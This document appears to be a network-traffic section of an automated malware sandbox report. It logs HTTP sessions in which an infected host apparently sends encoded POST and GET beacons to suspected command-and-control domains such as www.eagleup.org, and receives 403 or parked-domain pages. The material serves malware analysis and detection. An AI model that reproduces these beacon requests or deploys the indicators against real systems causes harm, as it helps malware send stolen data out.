                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaSswM1HGEtfrWdC+oZ9+6M7X0pJqUkbmqk2SrGwQCDFKyDfw502Zh6mR1/GGYRAId/UaakqJUvISKQMypRG//mH8/lwXoT8s+ktHx+IODgrMrP76vuahTJ6A0af/l2EOWZH2tZmZMkV65SlRJSwpbOBJTdUWWnMH86K8BeMaBRak3ZqvcRCFBBLA==
                                                                                                                                                    Oct 4, 2024 12:03:49.267256021 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    82192.168.11.204981491.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:51.786623001 CEST701OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 2b 6a 45 31 55 56 38 74 4f 37 57 53 48 2b 6f 5a 32 65 37 46 37 58 34 70 4a 72 52 6a 61 56 4f 6b 7a 47 76 47 69 42 43 44 41 4b 79 44 55 51 35 4c 34 35 68 68 6d 52 4a 52 47 43 63 52 41 4a 39 2f 55 59 43 6b 72 36 38 67 48 69 4b 53 48 53 70 66 62 50 2f 6d 48 38 2f 6c 77 58 39 47 38 73 6d 6b 71 33 42 2b 4a 73 6e 6e 6c 73 72 4d 72 4b 76 75 4e 78 54 56 36 41 30 73 66 39 52 4d 45 4d 75 5a 48 33 64 5a 6c 49 4d 6a 63 36 35 51 71 78 49 39 37 5a 71 55 4a 64 62 58 61 42 75 41 4e 57 6f 67 50 71 51 45 52 6f 31 31 5a 33 72 72 75 66 6c 35 41 48 41 61 57 4b 70 5a 55 43 4b 61 33 55 6d 47 33 50 6a 39 52 42 74 6d 50 66 51 3d
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVOkzGvGiBCDAKyDUQ5L45hhmRJRGCcRAJ9/UYCkr68gHiKSHSpfbP/mH8/lwX9G8smkq3B+JsnnlsrMrKvuNxTV6A0sf9RMEMuZH3dZlIMjc65QqxI97ZqUJdbXaBuANWogPqQERo11Z3rrufl5AHAaWKpZUCKa3UmG3Pj9RBtmPfQ=
                                                                                                                                                    Oct 4, 2024 12:03:51.968463898 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    83192.168.11.204981591.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:54.489429951 CEST1289OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 2b 6a 45 31 55 56 38 74 4f 37 57 53 48 2b 6f 5a 32 65 37 46 37 58 34 70 4a 72 52 6a 61 56 47 6b 7a 56 33 47 77 79 61 44 44 4b 79 44 64 77 35 77 34 35 67 37 6d 52 68 64 47 48 46 6b 41 4e 4e 2f 4f 39 65 6b 69 72 38 67 51 53 4b 53 49 79 70 53 47 2f 2b 69 48 38 76 68 77 58 74 47 38 73 6d 6b 71 31 5a 2b 66 4f 44 6e 6f 4d 72 50 37 36 76 71 61 68 54 78 36 44 45 38 66 39 55 78 46 39 4f 5a 48 58 4e 5a 32 4b 55 6a 45 71 35 65 72 78 49 6c 37 5a 6e 4b 4a 64 76 68 61 42 79 2b 4e 58 77 67 4f 63 70 73 43 4b 39 7a 4e 57 44 49 75 63 5a 74 43 30 51 75 52 6f 5a 52 54 45 48 36 35 79 69 75 75 65 50 54 57 79 45 74 52 72 6d 6b 4f 52 68 39 56 41 56 51 4b 4b 2f 46 53 6c 62 32 61 45 34 57 64 77 72 33 48 50 2b 76 35 49 45 31 6a 42 44 36 58 62 58 4f 65 6e 4d 63 78 47 31 68 4d 48 41 47 41 4c 45 66 6f 49 47 55 38 45 34 4b 31 61 7a 42 66 68 50 4b 59 51 50 68 36 4d 6b 44 7a 4e 67 4f 72 39 37 63 2f 62 64 4f 59 78 45 6e 31 43 4e 6e 30 76 57 2b 78 69 72 59 38 4c 78 4c 4c 2f 79 30 6b 6b [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVGkzV3GwyaDDKyDdw5w45g7mRhdGHFkANN/O9ekir8gQSKSIypSG/+iH8vhwXtG8smkq1Z+fODnoMrP76vqahTx6DE8f9UxF9OZHXNZ2KUjEq5erxIl7ZnKJdvhaBy+NXwgOcpsCK9zNWDIucZtC0QuRoZRTEH65yiuuePTWyEtRrmkORh9VAVQKK/FSlb2aE4Wdwr3HP+v5IE1jBD6XbXOenMcxG1hMHAGALEfoIGU8E4K1azBfhPKYQPh6MkDzNgOr97c/bdOYxEn1CNn0vW+xirY8LxLL/y0kkmj82RXPriMS7mdxwW8XZ2GF99ucA13oR3xDZJKai6gIFl2qBdamnn0T+VEBMA85T/fr912i+EoLFUMAjYnSZ18gtfNSeFMI5nzmFA8xMKs06JIc58FMY0PbkYU42G+0D1JPgPTexJUjQwFuUj+dv/2GIedX9sf7w3VTtApGqUSr1C5ClCQG4jG394PqcAxooFik9gIydEPb2PbCcWbbAJcBCXivR38wkoN4zZiTiCY63e/rIQv8gssjmNncvH3EISVQajfXH3ryfBOhCzRw7cOGBt+qH2kF7a9BXPUn/2A6DKIrrRC0YnnTYxLRTeUlyfQsVVnwYdqhosJOZAPBJtFLzwZLXvI3y8It7ZYl00/OoFE/GzjikpOwotR9CtMc/vuVsKFfBfVcBorniQPyisGG6VbCBY4rmxPj7l/y/SEFbyjqzPm8gmKAoq/rT3Jv/C5KhP9FC8MnlbqZoKXthQ
                                                                                                                                                    Oct 4, 2024 12:03:54.489484072 CEST5617OUTData Raw: 72 58 48 69 6f 31 5a 79 59 6c 33 41 37 6b 50 54 57 4d 37 5a 53 46 36 67 73 49 76 35 4a 70 46 79 2b 51 37 31 39 63 46 38 67 6e 4a 46 44 53 33 59 63 2b 30 4b 43 2b 4f 56 32 64 4c 58 59 75 36 7a 75 58 59 4a 47 4b 70 32 50 31 4a 6e 45 62 75 4d 47 47
                                                                                                                                                    Data Ascii: rXHio1ZyYl3A7kPTWM7ZSF6gsIv5JpFy+Q719cF8gnJFDS3Yc+0KC+OV2dLXYu6zuXYJGKp2P1JnEbuMGGZMfDzopXCUfwG+WebwxLHrfJQJ6Ai/cStJfTF7H26fTjzBZN+UCTqjvPYO+J6Q4QC1iwgSPosVHcKEFohTpZaQeB+zxzilWpp496hnWr6h41T9K/X7DPIAbL7q9zWs3cK7Zw3G205fMHcZ37BQBHgI9NLc3x/31Ye
                                                                                                                                                    Oct 4, 2024 12:03:54.671202898 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    84192.168.11.204981691.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:57.192121029 CEST428OUTGET /71zx/?aPfP=cNoDEx_hrvchZzh&PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus= HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:03:57.373759985 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    85192.168.11.204982691.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:04:40.062792063 CEST425OUTGET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:04:40.249202013 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    86192.168.11.2049827185.134.245.11380
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:04:45.456777096 CEST434OUTGET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:04:45.647903919 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:04:45 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Expires: Fri, 04 Oct 2024 11:04:45 GMT
                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                    Cache-Control: public
                                                                                                                                                    Data Raw: 31 35 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 73 74 72 61 74 65 67 79 76 61 6e 67 75 61 72 64 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b [TRUNCATED]
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:04:45.648313999 CEST1289INData Raw: 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74
                                                                                                                                                    Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { posi
                                                                                                                                                    Oct 4, 2024 12:04:45.648425102 CEST1289INData Raw: 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a
                                                                                                                                                    Data Ascii: <br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.strategyvanguard.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vr
                                                                                                                                                    Oct 4, 2024 12:04:45.648504972 CEST1289INData Raw: 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 74 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 73 74 72 61
                                                                                                                                                    Data Ascii: } </script> <div class="container"> <h1 id="t"> www.strategyvanguard.com is parked </h1> <p id="m"> www.strategyvanguard.com is registered, but the owner currently does not have an
                                                                                                                                                    Oct 4, 2024 12:04:45.648566008 CEST587INData Raw: 65 72 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 3e 44 6f 6d 65 6e 65 73 68 6f 70 20 41 53 20 26 63 6f 70 79 3b 0a 20 20 20 20 20 20 20 20 32 30 32 34 3c 2f 73 70 61 6e 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 26 6d
                                                                                                                                                    Data Ascii: er"> <span >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 357ff0d7b011a016cd9b6cd536f9bc25/parkedweb01 </span> </div> <script> q("ls").setAttribute("s


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    87192.168.11.2049828184.73.212.5180
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:04:50.770885944 CEST431OUTGET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:04:50.872040033 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:04:50 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:04:50.872102976 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 12:04:50.872132063 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 12:04:50.872231960 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 12:04:50.872276068 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 12:04:50.872288942 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 12:04:50.872301102 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 12:04:50.872457027 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 12:04:50.872495890 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
